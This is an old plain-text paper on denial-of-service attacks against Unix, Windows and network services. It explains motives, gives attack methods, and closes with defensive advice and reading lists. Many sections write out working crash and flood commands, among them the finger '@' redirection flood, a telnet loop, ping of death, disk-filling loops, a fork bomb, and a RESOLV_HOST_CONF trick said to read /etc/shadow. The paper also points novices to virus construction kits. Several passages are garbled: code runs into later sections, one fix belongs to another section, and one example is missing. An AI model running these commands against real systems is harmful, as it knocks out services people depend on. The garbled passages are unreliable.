.D.14. SOLARIS 2.X AND NFS
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
.E. DUMPING CORE
.E.1. SHORT COMMENT
.E.2. MALICIOUS USE OF NETSCAPE
.E.3. CORE DUMPED UNDER WUFTPD
.E.4. ld UNDER SOLARIS/X86
.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
.F.1. BASIC SECURITY PROTECTION
.F.1.1. INTRODUCTION
.F.1.2. PORT SCANNING
.F.1.3. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.4. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
.F.1.5. EXTRA SECURITY SYSTEMS
.F.1.6. MONITORING SECURITY
.F.1.7. KEEPING UP TO DATE
.F.1.8. READ SOMETHING BETTER
.F.2. MONITORING PERFORMANCE
.F.2.1. INTRODUCTION
.F.2.2. COMMANDS AND SERVICES
.F.2.3. PROGRAMS
.F.2.4. ACCOUNTING
.G. SUGGESTED READING
.G.1. INFORMATION FOR DEEPER KNOWLEDGE
.G.2. KEEPING UP TO DATE INFORMATION
.G.3. BASIC INFORMATION
.H. COPYRIGHT
.I. DISCLAIMER
.0. FOREWORD
------------
In this paper I have tried to answer the following questions:
- What is a denial of service attack?
- Why would someone crash a system?
- How can someone crash a system.
- How do I protect a system against denial of service attacks?
I also have a section called SUGGESTED READING were you can find
information about good free information that can give you a deeper
understanding about something.
Note that I have a very limited experience with Macintosh, OS/2 and
Windows and most of the material are therefore for Unix use.
You can always find the latest version at the following address:
http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT
Feel free to send comments, tips and so on to address:
t95hhu@student.tdb.uu.se
.A. INTRODUCTION
~~~~~~~~~~~~~~~~
.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
-----------------------------------------
Denial of service is about without permission knocking off
services, for example through crashing the whole system. This
kind of attacks are easy to launch and it is hard to protect
a system against them. The basic problem is that Unix
assumes that users on the system or on other systems will be
well behaved.
.A.2. WHY WOULD SOMEONE CRASH A SYSTEM?
---------------------------------------
.A.2.1. INTRODUCTION
--------------------
Why would someone crash a system? I can think of several reasons
that I have presentated more precisely in a section for each reason,
but for short:
.1. Sub-cultural status.
.2. To gain access.
.3. Revenge.
.4. Political reasons.
.5. Economical reasons.
.6. Nastiness.
I think that number one and six are the more common today, but that
number four and five will be the more common ones in the future.
.A.2.2. SUB-CULTURAL STATUS
---------------------------
After all information about syn flooding a bunch of such attacks
were launched around Sweden. The very most of these attacks were
not a part of a IP-spoof attack, it was "only" a denial of service
attack. Why?
I think that hackers attack systems as a sub-cultural pseudo career
and I think that many denial of service attacks, and here in the
example syn flooding, were performed for these reasons. I also think
that many hackers begin their carrer with denial of service attacks.
.A.2.3. TO GAIN ACCESS
----------------------
Sometimes could a denial of service attack be a part of an attack to
gain access at a system. At the moment I can think of these reasons
and specific holes:
.1. Some older X-lock versions could be crashed with a
method from the denial of service family leaving the system
open. Physical access was needed to use the work space after.
.2. Syn flooding could be a part of a IP-spoof attack method.
.3. Some program systems could have holes under the startup,
that could be used to gain root, for example SSH (secure shell).
.4. Under an attack it could be usable to crash other machines
in the network or to deny certain persons the ability to access
the system.
.5. Also could a system being booted sometimes be subverted,
especially rarp-boots. If we know which port the machine listen
to (69 could be a good guess) under the boot we can send false
packets to it and almost totally control the boot.
.A.2.4. REVENGE
---------------
A denial of service attack could be a part of a revenge against a user
or an administrator.
.A.2.5. POLITICAL REASONS
-------------------------
Sooner or later will new or old organizations understand the potential
of destroying computer systems and find tools to do it.
For example imaginate the Bank A loaning company B money to build a
factory threating the environment. The organization C therefor crash A:s
computer system, maybe with help from an employee. The attack could cost
A a great deal of money if the timing is right.
.A.2.6. ECONOMICAL REASONS
--------------------------
Imaginate the small company A moving into a business totally dominated by
company B. A and B customers make the orders by computers and depends
heavily on that the order is done in a specific time (A and B could be
stock trading companies). If A and B can't perform the order the customers
lose money and change company.
As a part of a business strategy A pays a computer expert a sum of money to
get him to crash B:s computer systems a number of times. A year later A
is the dominating company.
.A.2.7. NASTINESS
-----------------
I know a person that found a workstation where the user had forgotten to
logout. He sat down and wrote a program that made a kill -9 -1 at a
random time at least 30 minutes after the login time and placed a call to
the program from the profile file. That is nastiness.
.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?
---------------------------------------------
This is a hard question to answer and I don't think that it will
give anything to compare different Unix platforms. You can't say that
one Unix is more secure against denial of service, it is all up to the
administrator.
A comparison between Windows 95 and NT on one side and Unix on the
other could however be interesting.
Unix systems are much more complex and have hundreds of built in programs,
services... This always open up many ways to crash the system from
the inside.
In the normal Windows NT and 95 network were is few ways to crash
the system. Although were is methods that always will work.
That gives us that no big different between Microsoft and Unix can
be seen regardning the inside attacks. But there is a couple of
points left:
- Unix have much more tools and programs to discover an
attack and monitoring the users. To watch what another user
is up to under windows is very hard.
- The average Unix administrator probably also have much more
experience than the average Microsoft administrator.
The two last points gives that Unix is more secure against inside
denial of service attacks.
A comparison between Microsoft and Unix regarding outside attacks
are much more difficult. However I would like to say that the average
Microsoft system on the Internet are more secure against outside
attacks, because they normally have much less services.
.B. SOME BASIC TARGETS FOR AN ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.B.1. SWAP SPACE
----------------
Most systems have several hundred Mbytes of swap space to
service client requests. The swap space is typical used
for forked child processes which have a short life time.
The swap space will therefore almost never in a normal
cause be used heavily. A denial of service could be based
on a method that tries to fill up the swap space.
.B.2. BANDWIDTH
---------------
If the bandwidth is to high the network will be useless. Most
denial of service attack influence the bandwidth in some way.
.B.3. KERNEL TABLES
-------------------
It is trivial to overflow the kernel tables which will cause
serious problems on the system. Systems with write through
caches and small write buffers is especially sensitive.
Kernel memory allocation is also a target that is sensitive.
The kernel have a kernelmap limit, if the system reach this
limit it can not allocate more kernel memory and must be rebooted.
The kernel memory is not only used for RAM, CPU:s, screens and so
on, it it also used for ordinaries processes. Meaning that any system
can be crashed and with a mean (or in some sense good) algorithm pretty
fast.
For Solaris 2.X it is measured and reported with the sar command
how much kernel memory the system is using, but for SunOS 4.X there
is no such command. Meaning that under SunOS 4.X you don't even can
get a warning. If you do use Solaris you should write sar -k 1 to
get the information. netstat -k can also be used and shows how much
memory the kernel have allocated in the subpaging.
.B.4. RAM
---------
A denial of service attack that allocates a large amount of RAM
can make a great deal of problems. NFS and mail servers are
actually extremely sensitive because they do not need much
RAM and therefore often don't have much RAM. An attack at
a NFS server is trivial. The normal NFS client will do a
great deal of caching, but a NFS client can be anything
including the program you wrote yourself...
.B.5. DISKS
-----------
A classic attack is to fill up the hard disk, but an attack at
the disks can be so much more. For example can an overloaded disk
be misused in many ways.
.B.6. CACHES
-------------
A denial of service attack involving caches can be based on a method
to block the cache or to avoid the cache.
These caches are found on Solaris 2.X:
Directory name lookup cache: Associates the name of a file with a vnode.
Inode cache: Cache information read from disk in case it is needed
again.
Rnode cache: Holds information about the NFS filesystem.
Buffer cache: Cache inode indirect blocks and cylinders to realed disk
I/O.
.B.7. INETD
-----------
Well once inetd crashed all other services running through inetd no
longer will work.
.C. ATTACKING FROM THE OUTSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.C.1. TAKING ADVANTAGE OF FINGER
--------------------------------
Most fingerd installations support redirections to an other host.
Ex:
$finger @system.two.com@system.one.com
finger will in the example go through system.one.com and on to
system.two.com. As far as system.two.com knows it is system.one.com
who is fingering. So this method can be used for hiding, but also
for a very dirty denial of service attack. Lock at this:
$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack
All those @ signs will get finger to finger host.we.attack again and
again and again... The effect on host.we.attack is powerful and
the result is high bandwidth, short free memory and a hard disk with
less free space, due to all child processes (compare with .D.5.).
The solution is to install a fingerd which don't support redirections,
for example GNU finger. You could also turn the finger service off,
but I think that is just a bit to much.
.C.2. UDP AND SUNOS 4.1.3.
--------------------------
SunOS 4.1.3. is known to boot if a packet with incorrect information
in the header is sent to it. This is the cause if the ip_options
indicate a wrong size of the packet.
The solution is to install the proper patch.
.C.3. FREEZING UP X-WINDOWS
---------------------------
If a host accepts a telnet session to the X-Windows port (generally
somewhere between 6000 and 6025. In most cases 6000) could that
be used to freeze up the X-Windows system. This can be made with
multiple telnet connections to the port or with a program which
sends multiple XOpenDisplay() to the port.
The same thing can happen to Motif or Open Windows.
The solution is to deny connections to the X-Windows port.
.C.4. MALICIOUS USE OF UDP SERVICES
-----------------------------------
It is simple to get UDP services (echo, time, daytime, chargen) to
loop, due to trivial IP-spoofing. The effect can be high bandwidth
that causes the network to become useless. In the example the header
claim that the packet came from 127.0.0.1 (loopback) and the target
is the echo port at system.we.attack. As far as system.we.attack knows
is 127.0.0.1 system.we.attack and the loop has been establish.
Ex:
from-IP=127.0.0.1
to-IP=system.we.attack
Packet type:UDP
from UDP port 7
to UDP port 7
Note that the name system.we.attack looks like a DNS-name, but the
target should always be represented by the IP-number.
Quoted from proberts@clark.net (Paul D. Robertson) comment on
comp.security.firewalls on matter of "Introduction to denial of service"
" A great deal of systems don't put loopback on the wire, and simply
emulate it. Therefore, this attack will only effect that machine
in some cases. It's much better to use the address of a different
machine on the same network. Again, the default services should
be disabled in inetd.conf. Other than some hacks for mainframe IP
stacks that don't support ICMP, the echo service isn't used by many
legitimate programs, and TCP echo should be used instead of UDP
where it is necessary. "
.C.5. ATTACKING WITH LYNX CLIENTS
---------------------------------
A World Wide Web server will fork an httpd process as a respond
to a request from a client, typical Netscape or Mosaic. The process
lasts for less than one second and the load will therefore never
show up if someone uses ps. In most causes it is therefore very
safe to launch a denial of service attack that makes use of
multiple W3 clients, typical lynx clients. But note that the netstat
command could be used to detect the attack (thanks to Paul D. Robertson).
Some httpd:s (for example http-gw) will have problems besides the normal
high bandwidth, low memory... And the attack can in those causes get
the server to loop (compare with .C.6.)
.C.6. MALICIOUS USE OF telnet
-----------------------------
Study this little script:
Ex:
while : ; do
telnet system.we.attack &
done
An attack using this script might eat some bandwidth, but it is
nothing compared to the finger method or most other methods. Well
the point is that some pretty common firewalls and httpd:s thinks
that the attack is a loop and turn them self down, until the
administrator sends kill -HUP.
This is a simple high risk vulnerability that should be checked
and if present fixed.
.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
-----------------------------------------------
If the attacker makes a telnet connections to the Solaris 2.4 host and
quits using:
Ex:
Control-}
quit
then will inetd keep going "forever". Well a couple of hundred...
The solution is to install the proper patch.
.C.8. HOW TO DISABLE ACCOUNTS
-----------------------------
Some systems disable an account after N number of bad logins, or waits
N seconds. You can use this feature to lock out specific users from
the system.
.C.9. LINUX AND TCP TIME, DAYTIME
----------------------------------
Inetd under Linux is known to crash if to many SYN packets sends to
daytime (port 13) and/or time (port 37).
The solution is to install the proper patch.
.C.10. HOW TO DISABLE SERVICES
------------------------------
Most Unix systems disable a service after N sessions have been
open in a given time. Well most systems have a reasonable default
(lets say 800 - 1000), but not some SunOS systems that have the
default set to 48...
The solutions is to set the number to something reasonable.
.C.11. PARAGON OS BETA R1.4
---------------------------
If someone redirects an ICMP (Internet Control Message Protocol) packet
to a paragon OS beta R1.4 will the machine freeze up and must be
rebooted. An ICMP redirect tells the system to override routing
tables. Routers use this to tell the host that it is sending
to the wrong router.
The solution is to install the proper patch.
.C.12. NOVELLS NETWARE FTP
--------------------------
Novells Netware FTP server is known to get short of memory if multiple
ftp sessions connects to it.
.C.13. ICMP REDIRECT ATTACKS
----------------------------
Gateways uses ICMP redirect to tell the system to override routing
tables, that is telling the system to take a better way. To be able
to misuse ICMP redirection we must know an existing connection
(well we could make one for ourself, but there is not much use for that).
If we have found a connection we can send a route that
loses it connectivity or we could send false messages to the host
if the connection we have found don't use cryptation.
Ex: (false messages to send)
DESTINATION UNREACHABLE
TIME TO LIVE EXCEEDED
PARAMETER PROBLEM
PACKET TOO BIG
The effect of such messages is a reset of the connection.
The solution could be to turn ICMP redirects off, not much proper use
of the service.
.C.14. BROADCAST STORMS
-----------------------
This is a very popular method in networks there all of the hosts are
acting as gateways.
There are many versions of the attack, but the basic method is to
send a lot of packets to all hosts in the network with a destination
that don't exist. Each host will try to forward each packet so
the packets will bounce around for a long time. And if new packets
keep coming the network will soon be in trouble.
Services that can be misused as tools in this kind of attack is for
example ping, finger and sendmail. But most services can be misused
in some way or another.
.C.15. EMAIL BOMBING AND SPAMMING
---------------------------------
In a email bombing attack the attacker will repeatedly send identical
email messages to an address. The effect on the target is high bandwidth,
a hard disk with less space and so on... Email spamming is about sending
mail to all (or rather many) of the users of a system. The point of
using spamming instead of bombing is that some users will try to
send a replay and if the address is false will the mail bounce back. In
that cause have one mail transformed to three mails. The effect on the
bandwidth is obvious.
There is no way to prevent email bombing or spamming. However have
a look at CERT:s paper "Email bombing and spamming".
.C.16. TIME AND KERBEROS
------------------------
If not the the source and target machine is closely aligned will the
ticket be rejected, that means that if not the protocol that set the
time is protected it will be possible to set a kerberos server of
function.
.C.17. THE DOT DOT BUG
----------------------
Windows NT file sharing system is vulnerable to the under Windows 95
famous dot dot bug (dot dot like ..). Meaning that anyone can crash
the system. If someone sends a "DIR ..\" to the workstation will a
STOP messages appear on the screen on the Windows NT computer. Note that
it applies to version 3.50 and 3.51 for both workstation and server
version.
The solution is to install the proper patch.
.C.18. SUNOS KERNEL PANIC
-------------------------
Some SunOS systems (running TIS?) will get a kernel panic if a
getsockopt() is done after that a connection has been reset.
The solution could be to install Sun patch 100804.
.C.19. HOSTILE APPLETS
----------------------
A hostile applet is any applet that attempts to use your system
in an inappropriate manner. The problems in the java language
could be sorted in two main groups:
1) Problems due to bugs.
2) Problems due to features in the language.
In group one we have for example the java bytecode verifier bug, which
makes is possible for an applet to execute any command that the user
can execute. Meaning that all the attack methods described in .D.X.
could be executed through an applet. The java bytecode verifier bug
was discovered in late March 1996 and no patch have yet been available
(correct me if I'am wrong!!!).
Note that two other bugs could be found in group one, but they
are both fixed in Netscape 2.01 and JDK 1.0.1.
Group two are more interesting and one large problem found is the
fact that java can connect to the ports. Meaning that all the methods
described in .C.X. can be performed by an applet. More information
and examples could be found at address:
http://www.math.gatech.edu/~mladue/HostileArticle.html
If you need a high level of security you should use some sort of
firewall for protection against java. As a user you could have
java disable.
.C.20. VIRUS
------------
Computer virus is written for the purpose of spreading and
destroying systems. Virus is still the most common and famous
denial of service attack method.
It is a misunderstanding that virus writing is hard. If you know
assembly language and have source code for a couple of virus it
is easy. Several automatic toolkits for virus construction could
also be found, for example:
* Genvir.
* VCS (Virus Construction Set).
* VCL (Virus Construction Laboratory).
* PS-MPC (Phalcon/Skism - Mass Produced Code Generator).
* IVP (Instant Virus Production Kit).
* G2 (G Squared).
PS-MPC and VCL is known to be the best and can help the novice programmer
to learn how to write virus.
An automatic tool called MtE could also be found. MtE will transform
virus to a polymorphic virus. The polymorphic engine of MtE is well
known and should easily be catch by any scanner.
.C.21. ANONYMOUS FTP ABUSE
--------------------------
If an anonymous FTP archive have a writable area it could be misused
for a denial of service attack similar with with .D.3. That is we can
fill up the hard disk.
Also can a host get temporarily unusable by massive numbers of
FTP requests.
For more information on how to protect an anonymous FTP site could
CERT:s "Anonymous FTP Abuses" be a good start.
.C.22. SYN FLOODING
-------------------
Both 2600 and Phrack have posted information about the syn flooding attack.
2600 have also posted exploit code for the attack.
As we know the syn packet is used in the 3-way handshake. The syn flooding
attack is based on an incomplete handshake. That is the attacker host
will send a flood of syn packet but will not respond with an ACK packet.
The TCP/IP stack will wait a certain amount of time before dropping
the connection, a syn flooding attack will therefore keep the syn_received
connection queue of the target machine filled.
The syn flooding attack is very hot and it is easy to find more information
about it, for example:
[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Article by Christopher Klaus, including a "solution".
[.2.] http://jya.com/floodd.txt
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane
[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
for Phrack Magazine
.C.23. PING FLOODING
--------------------
I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.
Under Unix we could try something like: ping -s host
to send 64 bytes packets.
If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.
.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
----------------------------------------------------------
If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:
ping -l 65510 address.to.the.machine
And the machine will freeze or reboot.
Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).
.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
--------------------------------------------------
The subnet mask reply message is used under the reboot, but some
hosts are known to accept the message any time without any check.
If so all communication to or from the host us turned off, it's dead.
The host should not accept the message any time but under the reboot.
.C.26. FLEXlm
-------------
Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm lmdown command.
# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.
Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#
.C.27. BOOTING WITH TRIVIAL FTP
-------------------------------
To boot diskless workstations one often use trivial ftp with rarp or
bootp. If not protected an attacker can use tftp to boot the host.
.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.D.1. KERNEL PANIC UNDER SOLARIS 2.3
------------------------------------
Solaris 2.3 will get a kernel panic if this
is executed:
EX:
$ndd /dev/udp udp_status
The solution is to install the proper patch.
.D.2. CRASHING THE X-SERVER
---------------------------
If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0
be removed and the x-server will crash.
Ex:
$ rm /tmp/.x11-unix/x0
.D.3. FILLING UP THE HARD DISK
-----------------------------
If your hard disk space is not limited by a quota or if you can use
/tmp then it`s possible for you to fill up the file system.
Ex:
while : ;
mkdir .xxx
cd .xxx
done
.D.4. MALICIOUS USE OF eval
---------------------------
Some older systems will crash if eval '\!\!' is executed in the
C-shell.
Ex:
% eval '\!\!'
.D.5. MALICIOUS USE OF fork()
-----------------------------
If someone executes this C++ program the result will result in a crash
on most systems.
Ex:
#include
#include
#include
main()
{
int x;
while(x=0;x<1000000;x++)> -xxx
^C
$ ls
-xxx
$ rm -xxx
rm: illegal option -- x
rm: illegal option -- x
rm: illegal option -- x
usage: rm [-fiRr] file ...
$
Ex.II.
$ touch xxx!
$ rm xxx!
rm: remove xxx! (yes/no)? y
$ touch xxxxxxxxx!
$ rm xxxxxxxxx!
bash: !": event not found
$
(You see the size do count!)
Other well know methods is files with odd characters or spaces
in the name.
These methods could be used in combination with ".D.3 FILLING UP THE
HARDDISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindow:s File
Manager. You can also try to use: rm ./. It should work for
the first example if you have a shell.
.D.7. DIRECTORY NAME LOOKUPCACHE
--------------------------------
Directory name lookupcache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file to a vnode. But DNLC can only
operate on files with names that has less than N characters (for SunOS 4.x
up to 14 character, for Solaris 2.x up 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.
Create lets say 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.
If the impact is not big enough you should create more files or launch
more processes.
.D.8. CSH ATTACK
----------------
Just start this under /bin/csh (after proper modification)
and the load level will get very high (that is 100% of the cpu time)
in a very short time.
Ex:
|I /bin/csh
nodename : **************b
.D.9. CREATING FILES IN /tmp
----------------------------
Many programs creates files in /tmp, but are unable to deal with the problem
if the file already exist. In some cases this could be used for a
denial of service attack.
.D.10. USING RESOLV_HOST_CONF
-----------------------------
Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is
read in the variable and access through ping.
Ex:
$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf
.D.11. SUN 4.X AND BACKGROUND JOBS
----------------------------------
Thanks to Mr David Honig for the following:
" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root login as the kernel process table fills."
" The cute thing is the size of the
script, and how few keystrokes it takes to bring down a Sun
as a regular user."
.D.12. CRASHING DG/UX WITH ULIMIT
---------------------------------
ulimit is used to set a limit on the system resources available to the
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the
passwd file be set to zero.
.D.13. NETTUNE AND HP-UX
------------------------
/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:
- arp_killcomplete
- arp_killincomplete
- arp_unicast
- arp_rebroadcast
- icmp_mask_agent
- ip_defaultttl
- ip_forwarding
- ip_intrqmax
- pmtu_defaulttime
- tcp_localsubnets
- tcp_receive
- tcp_send
- tcp_defaultttl
- tcp_keepstart
- tcp_keepfreq
- tcp_keepstop
- tcp_maxretrans
- tcp_urgent_data_ptr
- udp_cksum
- udp_defaultttl
- udp_newbcastenable
- udp_pmtu
- tcp_pmtu
- tcp_random_seq
The solution could be to set the proper permission on
/sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.14. SOLARIS 2.X AND NFS
--------------------------
If a process is writing over NFS and the user goes over the disk
quota will the process go into an infinite loop.
.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
--------------------------------------------------
By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.
$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b
The solution could be to set the proper permission on
/sbin/mount_union:
#chmod u-s /sbin/mount_union
.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
----------------------------------------------------
Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.
.E. DUMPING CORE
~~~~~~~~~~~~~~~~
.E.1. SHORT COMMENT
-------------------
The core dumps things don't really belongs in this paper but I have
put them here anyway.
.E.2. MALICIOUS USE OF NETSCAPE
-------------------------------
Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.
Ex:
.E.3. CORE DUMPED UNDER WUFTPD
------------------------------
A core dumped could be created under wuftp with two different
methods:
(1) Then pasv is given (user not logged in (ftp -n)). Almost all
versions of BSD:s ftpd.
(2) More than 100 arguments is given with any executable
command. Presents in all versions of BSD:sd ftpd.
.E.4. ld UNDER SOLARIS/X86
--------------------------
Under Solaris 2.4/X86 ld dumps core if given with the -s option.
.F. HOW DO I PROTECT A SYSTEM AGAINST DENIAL OF SERVICE ATTACKS?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.F.1. BASIC SECURITY PROTECTION
-------------------------------
.F.1.1. INTRODUCTION
--------------------
You can not make your system totally secured against denial of service
attacks but for attacks from the outside you can do a lot. I put this
work list together and hope that it can be of some use.
.F.1.2. SECURITY PATCHES
------------------------
Always install the proper security patches. As for patch numbers
I don't want to put them out, but that doesn't matter because you
anyway want to check that you have all security patches installed,
so get a list and check! Also note that patches change over time and
that a solution suggested in security bulletins (i.e. CERT) often
is somewhat temporary.
.F.1.3. PORT SCANNING
---------------------
Check which services you have. Don't check with the manual
or some configuration file, instead scan the ports with sprobe
or some other port scanner. Actual you should do this regualy to see
that anyone don't have installed a service that you don't want on
the system (could for example be service used for a pirate site).
Disable every service that you don't need, could for example be rexd,
fingerd, systat, netstat, rusersd, sprayd, pop3, uucpd, echo, chargen,
tftp, exec, ufs, daytime, time... Any combination of echo, time, daytime
and chargen is possible to get to loop. There is however no need
to turn discard off. The discard service will just read a packet
and discard it, so if you turn off it you will get more sensitive to
denial of service and not the opposite.
Actual can services be found on many systems that can be used for
denial of service and brute force hacking without any logging. For
example Stock rexec never logs anything. Most popd:s also don't log
anything
.F.1.4. CHECK THE OUTSIDE ATTACKS DESCRIBED IN THIS PAPER
---------------------------------------------------------
Check that attacks described in this paper and look at the
solution. Some attacks you should perform yourself to see if they
apply to your system, for example:
- Freezing up X-Windows.
- Malicious use of telnet.
- How to disable services.
- SunOS kernel panic.
- Attacking with lynx clients.
- Crashing systems with ping from Windows 95 machines.
That is stress test your system with several services and look at
the effect.
Note that Solaris 2.4 and later have a limit on the number of ICMP
error messages (1 per 500 ms I think) that can cause problems then
you test your system for some of the holes described in this paper.
But you can easy solve this problem by executing this line:
$ /usr/sbin/ndd -set /dev/ip ip_icmp_err_interval 0
.F.1.5. CHECK THE INSIDE ATTACKS DESCRIBED IN THIS PAPER
--------------------------------------------------------
Check the inside attacks, although it is always possibly to crash
the system from the inside you don't want it to be to easy. Also
have several of the attacks applications besides denial of service,
for example:
- Crashing the X-Server: If stickybit is not set in /tmp
a number of attacks to gain
access can be performed.
- Using resolv_host_conf: Could be used to expose
confidential data like
/etc/shadow.
- Core dumped under wuftpd: Could be used to extract
password-strings.
If I don't have put out a solution I might have recommended son other paper.
If not I don't know of a paper with a solution I feel that I can recommend.
You should in these causes check with your company.
.F.1.6. EXTRA SECURITY SYSTEMS
------------------------------
Also think about if you should install some extra security systems.
The basic that you always should install is a logdaemon and a wrapper.
A firewall could also be very good, but expensive. Free tools that can
be found on the Internet is for example:
TYPE: NAME: URL:
LOGDAEMON NETLOG ftp://net.tamu.edu/pub/security/TAMU
WRAPPER TCP WRAPPERS ftp://cert.org/pub/tools/tcp_wrappers
FIREWALL TIS ftp://ftp.tis.com/pub/firewalls/toolkit
Note that you should be very careful if building your own firewall with
TIS or you might open up new and very bad security holes, but it is a very
good security packer if you have some basic knowledge.
It is also very good to replace services that you need, for example telnet,
rlogin, rsh or whatever, with a tool like ssh. Ssh is free and can be
found at URL:
ftp://ftp.cs.hut.fi/pub/ssh
The addresses I have put out are the central sites for distributing
and I don't think that you should use any other except for CERT.
For a long list on free general security tools I recommend:
" computer="" security="" frequently="" asked="" questions="">
.F.1.7. MONITORING SECURITY
---------------------------
Also monitor security regular, for example through examining system log
files, history files... Even in a system without any extra security systems
could several tools be found for monitoring, for example:
- uptime
- showmount
- ps
- netstat
- finger
(see the man text for more information).
.F.1.8. KEEPING UP TO DATE
--------------------------
It is very important to keep up to date with security problems. Also
understand that then, for example CERT, warns for something it has often
been dark-side public for sometime, so don't wait. The following resources
that helps you keeping up to date can for example be found on the Internet:
- CERT mailing list. Send an e-mail to cert@cert.org to be placed
on the list.
- Bugtraq mailing list. Send an e-mail to bugtraq-request@fc.net.
- WWW-security mailing list. Send an e-mail to
www-security@ns2.rutgers.edu.
.F.1.9. READ SOMETHING BIGGER AND BETTER
----------------------------------------
Let's start with papers on the Internet. I am sorry to say that it is not
very many good free papers that can be found, but here is a small collection
and I am sorry if have have over looked a paper.
(1) The Rainbow books is a long series of free books on computer security.
US citizens can get the books from:
INFOSEC AWARENESS OFFICE
National Computer Security Center
9800 Savage Road
Fort George G. Meader, MD 20755-600
We other just have to read the papers on the World Wide Web. Every
paper can not however be found on the Internet.
(2) "Improving the security of your Unix system" by Curry is also very
nice if you need the very basic things. If you don't now anything about
computer security you can't find a better start.
(3) "The WWW security FAQ" by Stein is although it deal with W3-security
the very best better on the Internet about computer security.
(4) CERT have aklso published several good papers, for example:
- Anonymous FTP Abuses.
- Email Bombing and Spamming.
- Spoofed/Forged Email.
- Protecting yourself from password file attacks.
I think however that the last paper have overlooked several things.
(5) For a long list on papers I can recommend:
"FAQ: Computer Security Frequently Asked Questions".
(6) Also see section ".G. SUGGESTED READING"
You should also get some big good commercial book, but I don't want
to recommend any.
.F.2. MONITORING PERFORMANCE
----------------------------
.F.2.1. INTRODUCTION
--------------------
There is several commands and services that can be used for
monitoring performance. And at least two good free programs can
be found on Internet.
.F.2.2. COMMANDS AND SERVICES
-----------------------------
For more information read the man text.
netstat Show network status.
nfsstat Show NFS statistics.
sar System activity reporter.
vmstat Report virtual memory statistics.
timex Time a command, report process data and system
activity.
time Time a simple command.
truss Trace system calls and signals.
uptime Show how long the system has been up.
Note that if a public netstat server can be found you might be able
to use netstat from the outside. netstat can also give information
like tcp sequence numbers and much more.
.F.2.3. PROGRAMS
----------------
Proctool: Proctool is a freely available tool for Solaris that monitors
and controls processes.
ftp://opcom.sun.ca/pub/binaries/
Top: Top might be a more simple program than Proctool, but is
good enough.
.F.2.4. ACCOUNTING
------------------
To monitor performance you have to collect information over a long
period of time. All Unix systems have some sort of accounting logs
to identify how much CPU time, memory each program uses. You should
check your manual to see how to set this up.
You could also invent your own account system by using crontab and
a script with the commands you want to run. Let crontab run the script
every day and compare the information once a week. You could for
example let the script run the following commands:
- netstat
- iostat -D
- vmstat
.G. SUGGESTED READING
~~~~~~~~~~~~~~~~~~~~~
.F.1. INFORMATION FOR DEEPER KNOWLEDGE
-------------------------------------
(1) Hedrick, C. Routing Information Protocol. RFC 1058, 1988.
(2) Mills, D.L. Exterior Gateway Protocol Formal Specification. RFC 904, 1984.
(3) Postel, J. Internet Control Message Protocol. RFC 792, 1981.
(4) Harrenstien, K. NAME/FINGER Protocol, RFC 742, 1977.
(5) Sollins, K.R. The TFTP Protocol, RFC 783, 1981.
(6) Croft, W.J. Bootstrap Protocol, RFC 951, 1985.
Many of the papers in this category was RFC-papers. A RFC-paper
is a paper that describes a protocol. The letters RCS stands for
Request For Comment. Hosts on the Internet are expected to understand
at least the common ones. If you want to learn more about a protocol
